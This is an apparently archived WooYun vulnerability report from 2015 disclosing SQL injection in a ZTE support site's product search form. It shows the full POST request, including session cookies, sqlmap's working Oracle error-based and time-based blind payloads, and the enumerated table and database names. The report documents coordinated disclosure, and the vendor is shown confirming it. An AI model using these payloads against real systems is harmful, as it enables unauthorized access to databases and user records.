当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125657

漏洞标题:中兴分站SQL注入

相关厂商:中兴通讯股份有限公司

漏洞作者: missy

提交时间:2015-07-09 15:55

修复时间:2015-08-23 18:48

公开时间:2015-08-23 18:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开

简要描述:

详细说明:

注入:
POST /support/user/ProductList.aspx?_xml=a HTTP/1.1
Host: support.zte.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://support.zte.com.cn/support/user/ProductList.aspx?type=2
Content-Length: 66
Cookie: ZTE_lang=zh-cn; ASP.NET_SessionId=kmryp045g4o5ly45bjhg25jx; ztesupportloginname=qweea123; SptUserID=1973227
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
writer=productSearch&product=123&one=&two=&three=&four=&pageType=2


参数:product


1.jpg


2.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: product (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: writer=productSearch&product=123') AND 8473=CTXSYS.DRITHSX.SN(8473,(CHR(113)||CHR(112)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (8473=8473) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(122)||CHR(113))) AND ('rWTm' LIKE 'rWTm&one=&two=&three=&four=&pageType=2
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: writer=productSearch&product=123') AND 9832=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('etVH' LIKE 'etVH&one=&two=&three=&four=&pageType=2
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
current schema (equivalent to database on Oracle):    'NEW_SUPPORT'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: product (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: writer=productSearch&product=123') AND 8473=CTXSYS.DRITHSX.SN(8473,(CHR(113)||CHR(112)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (8473=8473) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(122)||CHR(113))) AND ('rWTm' LIKE 'rWTm&one=&two=&three=&four=&pageType=2
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: writer=productSearch&product=123') AND 9832=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('etVH' LIKE 'etVH&one=&two=&three=&four=&pageType=2
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
Database: NEW_SUPPORT
[43 tables]
+--------------------------------+
| ACCEPTEMAIL                    |
| BAK2_ZTESPT_BASIC_USERINFO     |
| BAK_ZTESPT_BASIC_FTPS          |
| BAK_ZTESPT_BASIC_USERINFO      |
| BAK_ZTESPT_BASIC_USERINFO1     |
| BAK_ZTESPT_DOC_APPLY           |
| BAK_ZTESPT_DOC_APPLYDEPT       |
| BAK_ZTESPT_DOC_TECH            |
| BAK_ZTESPT_SOFT_FILE           |
| CR_REPORTS                     |
| SPT_ATTACHMENT                 |
| SPT_KL_BAK_JIANTING            |
| SPT_KL_GE                      |
| ZTESPT_BASIC_AUTHORIZE_SCOPE   |
| ZTESPT_BASIC_NEWS              |
| ZTESPT_BASIC_PRODUCT_V         |
| ZTESPT_BASIC_TYPE              |
| ZTESPT_BASIC_USERINFO          |
| ZTESPT_BASIC_USERINFO_BAK      |
| ZTESPT_BASIC_USERINFO_BAK2     |
| ZTESPT_CUSTOMER_PRODUCTPDM_TMP |
| ZTESPT_CUSTOMER_PRODUCT_TMP    |
| ZTESPT_EMAIL_LOG               |
| ZTESPT_FORUM_REPEAT            |
| ZTESPT_FORUM_TOPIC             |
| ZTESPT_KLS_DIFF_EN_QSP         |
| ZTESPT_KLS_DIFF_QSP            |
| ZTESPT_NETSRV_FEEDBACK         |
| ZTESPT_NETSRV_USERIDEA         |
| ZTESPT_OTHER_HELP              |
| ZTESPT_OTHER_HOTLINE           |
| ZTESPT_OTHER_QWCLIENT          |
| ZTESPT_OTHER_QWCUSTOMER        |
| ZTESPT_PARTNERDOC_TSMFOLDER_TP |
| ZTESPT_PRM_USERINFO            |
| ZTESPT_QW_SCENEQUESTIONS       |
| ZTESPT_SENDMAIL                |
| ZTESPT_SM                      |
| ZTESPT_SOFT_FILE               |
| ZTESPT_SOFT_REPLACE            |
| ZTESPT_SUBSCRIBE_PRODUCT       |
| ZTESPT_USER_EMAIL              |
| ZTESPT_VERUPGRADE_SUBSCRIBE    |
+--------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: product (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: writer=productSearch&product=123') AND 8473=CTXSYS.DRITHSX.SN(8473,(CHR(113)||CHR(112)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (8473=8473) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(122)||CHR(113))) AND ('rWTm' LIKE 'rWTm&one=&two=&three=&four=&pageType=2
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: writer=productSearch&product=123') AND 9832=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('etVH' LIKE 'etVH&one=&two=&three=&four=&pageType=2
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
available databases [13]:
[*] APEX_030200
[*] CALLCENTER
[*] CTXSYS
[*] ECC_CSC
[*] ENSUPPORT
[*] EXFSYS
[*] MDSYS
[*] NEW_SUPPORT
[*] OLAPSYS
[*] SUPPORT
[*] SYS
[*] SYSTEM
[*] XDB

漏洞证明:

修复方案:

参数过滤

版权声明:转载请注明来源 missy@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-07-09 18:47

厂商回复:

感谢~

最新状态:

暂无